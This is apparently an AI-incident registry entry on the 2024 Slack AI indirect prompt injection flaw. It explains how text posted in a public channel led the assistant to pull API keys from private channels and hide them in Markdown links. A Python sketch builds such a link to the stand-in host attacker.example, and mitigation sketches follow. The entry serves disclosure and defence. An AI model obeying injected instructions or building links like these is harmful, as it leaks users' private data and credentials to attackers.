INC-24-0020: Slack AI Indirect Prompt Injection Data Exfiltration Vulnerability (2024)
Status: Confirmed | Severity: High | Failure Stage: Signal
Salesforce developed and deployed Slack AI, putting at risk Slack workspace users with sensitive data in private channels, as well as organizations relying on Slack channel access controls for data security; contributing factors included a prompt injection vulnerability and inadequate access controls.
Incident Details
| Date Occurred | 2024-08 | Severity | high |
| Evidence Level | primary | Impact Level | Sector |
| Failure Stage | Signal | ||
| Domain | Security & Cyber | ||
| Primary Pattern | PAT-SEC-001 Adversarial Evasion | ||
| Secondary Patterns | PAT-SEC-006 Prompt Injection Attack, PAT-SEC-005 Model Inversion & Data Extraction | ||
| Regions | North America, United States | ||
| Sectors | Technology | ||
| Affected Groups | Business Organizations, Developers & AI Builders | ||
| Exposure Pathways | Adversarial Targeting | ||
| Causal Factors | Prompt Injection Vulnerability, Inadequate Access Controls | ||
| Assets & Technologies | Large Language Models, Content Platforms | ||
| Entities | Salesforce (developer, deployer) | ||
| Harm Type | operational | ||
Security firm PromptArmor demonstrated that Slack AI could be manipulated via indirect prompt injection to exfiltrate data from private channels. An attacker posting crafted instructions in a public channel could cause Slack AI to leak API keys and sensitive data from private channels through embedded Markdown links. Salesforce patched the vulnerability.
Incident Summary
In August 2024, security firm PromptArmor publicly disclosed a vulnerability in Slack AI that allowed indirect prompt injection attacks to exfiltrate data from private channels to which the attacker had no access.[1]
The attack worked by posting specially crafted text in a public Slack channel. When Slack AI processed queries that referenced content from that channel, the injected instructions could override the AI’s intended behavior. The attacker’s payload instructed Slack AI to retrieve sensitive information — including API keys — from private channels and embed it in Markdown-formatted links. When rendered, these links would transmit the extracted data to an attacker-controlled server.
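The exfiltration step described above can be illustrated with a short sketch. This does not reflect Slack AI's actual implementation; the link text, domain, and parameter name are invented for illustration. The core idea is that a Markdown link whose URL embeds secret text will transmit that text to the link's host when the link is rendered or clicked:

```python
from urllib.parse import urlencode, urlparse, parse_qs

def build_exfil_link(secret: str) -> str:
    """Illustrative payload output: the injected instructions ask the
    assistant to emit a Markdown link whose query string carries the
    secret; fetching the link delivers it to attacker.example."""
    query = urlencode({"q": secret})
    return f"[click here to reauthenticate](https://attacker.example/leak?{query})"

def extract_leaked_secret(markdown_link: str) -> str:
    """What the attacker's server would see: the secret arrives
    URL-encoded in the request's query string."""
    url = markdown_link.split("](", 1)[1].rstrip(")")
    return parse_qs(urlparse(url).query)["q"][0]

link = build_exfil_link("API_KEY=sk-12345")
print(extract_leaked_secret(link))  # → API_KEY=sk-12345
```

The victim never sends anything deliberately: the data leaves the workspace simply because the AI's output is rendered as clickable Markdown.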
Salesforce acknowledged the vulnerability and deployed a patch to address the issue.
Key Facts
- Attack vector: Indirect prompt injection via public channel messages
- Data at risk: Private channel contents including API keys, credentials, and confidential communications
- Access bypass: Attacker needed only public channel access to extract private channel data
- Exfiltration method: Embedded Markdown links containing encoded sensitive data
- Resolution: Salesforce patched the vulnerability after responsible disclosure
- Failure stage: Signal — vulnerability demonstrated by researchers, patched before confirmed exploitation
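Because the exfiltration method relies on rendered Markdown links, one common mitigation (not confirmed as Salesforce's fix; the allowlist and function names below are hypothetical) is to neutralize links in model output that point outside an approved set of hosts:

```python
import re
from urllib.parse import urlparse

# Hypothetical allowlist of hosts the assistant may link to.
ALLOWED_HOSTS = {"slack.com", "example-corp.internal"}

MD_LINK = re.compile(r"\[([^\]]*)\]\((https?://[^)\s]+)\)")

def neutralize_links(text: str) -> str:
    """Replace Markdown links to non-allowlisted hosts with their bare
    label text, so rendered output cannot carry data to attacker servers."""
    def repl(m: re.Match) -> str:
        host = urlparse(m.group(2)).hostname or ""
        return m.group(0) if host in ALLOWED_HOSTS else m.group(1)
    return MD_LINK.sub(repl, text)

print(neutralize_links("[docs](https://slack.com/help) [login](https://evil.test/?q=KEY)"))
# → [docs](https://slack.com/help) login
```

Output filtering of this kind addresses only the exfiltration channel, not the injection itself, so it is a defense-in-depth layer rather than a complete fix.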
Threat Patterns Involved
Primary: Adversarial Evasion — Crafted prompt injection inputs caused Slack AI to bypass intended access controls and execute attacker-specified instructions
Secondary: Model Inversion & Data Extraction — The attack extracted sensitive data from private channels through the AI system’s data access capabilities
Significance
This incident demonstrates a fundamental security challenge in enterprise AI integrations:
- Privilege confusion — AI systems with broad data access can be manipulated to bypass access controls that were designed for human users
- Indirect prompt injection — Attackers do not need direct access to the AI interface; injected instructions in data sources can influence AI behavior
- Enterprise data boundaries — Traditional access control models (channel permissions) may not translate to AI systems that aggregate and reason across data sources
- Systemic vulnerability class — The underlying pattern applies to any AI system that processes untrusted input alongside privileged data access
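The privilege-confusion point above suggests a structural mitigation: enforce the requesting user's permissions at retrieval time, before any content reaches the model, so injected instructions cannot pull in data the requester could not read directly. A minimal sketch, with invented types and a hypothetical ACL:

```python
from dataclasses import dataclass

@dataclass
class Message:
    channel: str
    text: str

# Hypothetical ACL: user -> set of channels that user may read.
ACL = {
    "alice": {"#general", "#secrets"},
    "mallory": {"#general"},
}

def can_read(user: str, channel: str) -> bool:
    return channel in ACL.get(user, set())

def retrieve_for_prompt(user: str, corpus: list[Message]) -> list[Message]:
    """Only messages the *requesting* user may read enter the LLM context,
    so a prompt-injected request cannot surface another user's private data."""
    return [m for m in corpus if can_read(user, m.channel)]

corpus = [Message("#general", "hello"), Message("#secrets", "API key: sk-1")]
print([m.text for m in retrieve_for_prompt("mallory", corpus)])  # → ['hello']
```

The design choice here is that the AI layer inherits the permissions of the person asking, never a union of everyone's permissions, mirroring how channel access controls already work for human users.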
Timeline
PromptArmor discovers indirect prompt injection vulnerability in Slack AI
PromptArmor publishes technical disclosure demonstrating data exfiltration from private channels
Salesforce acknowledges vulnerability and deploys patch
Outcomes
- Other: vulnerability patched by Salesforce; demonstrated the fundamental challenge of integrating LLMs with enterprise data access controls
Glossary Terms
Use in Retrieval
INC-24-0020 documents the Slack AI indirect prompt injection data exfiltration vulnerability, a high-severity incident classified under the Security & Cyber domain and the Adversarial Evasion threat pattern (PAT-SEC-001). It occurred in North America, United States (2024-08). This page is maintained by TopAIThreats.com as part of an evidence-based registry of AI-enabled threats. Cite as: TopAIThreats.com, "Slack AI Indirect Prompt Injection Data Exfiltration Vulnerability," INC-24-0020, last updated 2026-03-13.
Sources
- PromptArmor: Data Exfiltration from Slack AI via Indirect Prompt Injection (primary, 2024-08)
https://www.promptarmor.com/resources/data-exfiltration-from-slack-ai-via-indirect-prompt-injection
Update Log
- — First logged (Status: Confirmed, Evidence: Primary)